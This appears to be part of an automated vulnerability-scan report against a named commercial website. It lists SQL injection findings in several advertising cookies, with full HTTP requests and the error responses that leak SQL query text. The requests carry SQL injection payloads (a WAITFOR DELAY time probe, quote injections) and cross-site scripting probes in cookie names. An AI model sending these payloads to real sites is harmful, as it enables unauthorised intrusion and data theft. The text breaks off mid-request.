Date: Mon, 14 Mar 2011 01:55:09 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=gf7nq24u9jo17q6q8ph884vav2; path=/
Content-Length: 6630
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5

1.98. http://www.insideup.com/ppc/leadflow/caad00/project.php [OAVARS[a750dce4] cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The OAVARS[a750dce4] cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the OAVARS[a750dce4] cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/caad00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A7455393AF782B871C13625AD15C8267; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D'; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:55:10 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=qvu8pafkb6fgnpgamrdo2uh4c7; path=/
Content-Length: 6630
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5

1.99. http://www.insideup.com/ppc/leadflow/caad00/project.php [OAVARS[aca4086b] cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The OAVARS[aca4086b] cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the OAVARS[aca4086b] cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/caad00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A7455393AF782B871C13625AD15C8267; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D'; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:55:12 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=n9m1914ajtc9689fo8qd6o3kq2; path=/
Content-Length: 6630
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5

1.100. http://www.insideup.com/ppc/leadflow/caad00/project.php [OAVARS[ad01cc48] cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The OAVARS[ad01cc48] cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the OAVARS[ad01cc48] cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/caad00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A7455393AF782B871C13625AD15C8267; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT'; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x001188)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x001190]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x001194)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x001197)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x00119B))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 14 Mar 2011 01:55:19 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=4f13v3fdesjn4aee1dapc2c420; path=/
Content-Length: 6630
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj
   left join sub_category cats on cats.sub_category_id = prj.catId
   left join lea
...[SNIP]...
9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5

1.101. http://www.insideup.com/ppc/leadflow/caad00/project.php [OAVARS[body{x:expression(netsparker(0x00119B))}] cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.insideup.com
Path:   /ppc/leadflow/caad00/project.php

Issue detail

The OAVARS[body{x:expression(netsparker(0x00119B))}] cookie appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the OAVARS[body{x:expression(netsparker(0x00119B))}] cookie, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /ppc/leadflow/caad00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=A7455393AF782B871C13625AD15C8267; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D; OAVARS[aca4086b]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2229%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%224%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2FmarketingWhitepaper.html%22%3B%7D; sessionID=e79ac988a10eeb817a2c9a0eb1b6555e; OAVARS[ad01cc48]=DEFAULT; OAVARS[\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960aNS_NO]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[default]=DEFAULT; OAVARS[%27]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'\"--></style></script><script>netsparker(0x001184)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Enetsparker%280x001186%29%3C%2Fscript%3E]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 